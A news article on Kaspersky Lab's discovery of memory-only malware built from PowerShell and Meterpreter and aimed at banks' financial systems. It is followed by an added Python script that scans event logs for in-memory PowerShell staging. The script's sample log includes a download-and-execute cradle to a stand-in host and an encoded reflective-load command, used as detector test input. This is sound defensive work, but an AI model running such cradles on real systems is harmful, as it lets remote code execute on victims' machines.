Organizations in 40 countries across the world have fallen victim to a new trend in cybersecurity attacks: "invisible" malware that hides within legitimate software. The attacks were discovered by cybersecurity researchers at Kaspersky Lab, who detailed the issue in a blog post on Wednesday.
According to a press release from Kaspersky, the attacks have been detected on more than 140 enterprise networks, occurring most commonly in the US, France, Ecuador, Kenya, the UK, and Russia. The goal of the attacks is to access the financial systems of the victim organization, the release said.
Windows PowerShell and some "widely available penetration-testing and administration tools" were among the legitimate software named in the attacks. The release noted that the attacks allow the malware to hide in memory, with no malware files typically showing up on the hard drive itself.
This approach complicates detection efforts, and provides few, if any, samples for researchers to work with. And, once the victim reboots their machine, all traces of the attack are wiped, the release said.
"That is why memory forensics is becoming critical to the analysis of malware and its functions," Sergey Golovanov, principal security researcher at Kaspersky Lab, said in a press release. "In these particular incidents, the attackers used every conceivable anti-forensic technique, demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible."
Kaspersky Lab researchers were initially contacted by banks that noticed Meterpreter software, often associated with “malicious purposes,” in their server memory. Researchers then noticed it was there alongside PowerShell scripts and other legitimate code, the release said.
“The combined tools had been adapted into malicious code that could hide in the memory, invisibly collecting the passwords of system administrators so that the attackers could remotely control the victim’s systems,” the release said. “The ultimate goal appears to have been access to financial processes.”
So far, the attackers are unknown, the release said. It also remains unclear whether the attacks are the work of a single person or a group. However, the researchers noted, the approach is similar to that taken by the hacker groups GCMAN and Carbanak.
It is important to note that whoever perpetrated these attacks is still active, the release said. And if a security professional were to go looking for evidence of such an attack, detection would only be possible in RAM, on the network, and in the registry.
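Because nothing is written to disk, one of the few durable records of this kind of activity is PowerShell's own logging. The following Python triage script is an added example, not code from the article or from Kaspersky Lab. It assumes a constructed, pipe-delimited export of Windows event records (script block logging event 4104 and process creation event 4688), and the indicator patterns it matches are assumed heuristics for scripts that stage code in memory rather than dropping a file; it also decodes `-EncodedCommand` payloads so that base64 encoding alone cannot hide an indicator.

```python
"""Triage helper for memory-only PowerShell tooling.

Added example, not code from the article or from Kaspersky Lab. It assumes a
constructed, pipe-delimited export of Windows event records in the form
    timestamp|event_id|host|message
covering PowerShell script block logging (event 4104) and process creation
(event 4688). The indicator patterns are assumed heuristics for scripts that
stage code in memory instead of writing a file to disk.
"""
import base64
import re
from dataclasses import dataclass

# Assumed indicators of in-memory staging; tune to the environment.
INDICATORS = {
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load\b", re.I),
    "download_cradle": re.compile(
        r"(?:Invoke-Expression|IEX)\s*\(?\s*\(?New-Object\s+Net\.WebClient", re.I),
    "memory_stream": re.compile(r"\bIO\.MemoryStream\b", re.I),
    "native_alloc": re.compile(r"\bVirtualAlloc\b|\bCreateThread\b", re.I),
}
WATCHED_EVENTS = {4104, 4688}


@dataclass
class Finding:
    host: str
    event_id: int
    indicators: list


def decode_encoded_command(message: str) -> str:
    """Return the UTF-16LE script hidden behind -EncodedCommand/-enc, or ''.
    Matching on the decoded text means encoding alone cannot hide an indicator."""
    m = re.search(r"-(?:EncodedCommand|enc|ec)\b\s+([A-Za-z0-9+/=]+)", message, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def scan_line(line: str):
    """Parse one record; return a Finding if it carries any indicator, else None."""
    try:
        _ts, event_id, host, message = line.split("|", 3)
        event_id = int(event_id)
    except ValueError:
        return None  # malformed record: skip rather than abort the triage run
    if event_id not in WATCHED_EVENTS:
        return None
    decoded = decode_encoded_command(message)
    haystack = message + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if decoded:
        hits.append("encoded_command")
    return Finding(host, event_id, hits) if hits else None


def scan_log(lines):
    """Scan every record and return the list of Findings in log order."""
    return [f for f in (scan_line(line) for line in lines) if f is not None]


# Constructed sample records (not real telemetry from the incidents described).
SAMPLE_ENCODED = base64.b64encode(
    "[System.Reflection.Assembly]::Load($buf).EntryPoint.Invoke($null,$null)"
    .encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "2017-02-08T10:01:00|4104|ws01|Get-ChildItem C:\\Users | Measure-Object",
    "2017-02-08T10:01:05|4624|ws01|An account was successfully logged on",
    "2017-02-08T10:02:13|4104|srv02|IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage.ps1')",
    f"2017-02-08T10:02:20|4688|srv02|powershell.exe -NoP -w hidden -enc {SAMPLE_ENCODED}",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.host} event {f.event_id}: {', '.join(f.indicators)}")
```

Run against the constructed sample, the script reports two findings on `srv02` (a download cradle in a 4104 record and a reflectively loaded assembly behind an encoded command in a 4688 record) and ignores the benign directory listing and the logon event. Script block logging has to be enabled for the 4104 records to exist at all, which is the practical point: without it, a reboot leaves nothing to triage.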
The 3 big takeaways for TechRepublic readers
- Kaspersky Lab’s global research and analysis team recently detected “invisible” malware that comes in with legitimate software and hides in memory.
- The attacks, which are targeted toward gaining access to financial systems, occurred on 140 networks in 40 countries around the world.
- Researchers said that it is nearly impossible to determine who is behind the attacks, and they urge caution as the attacker is still active.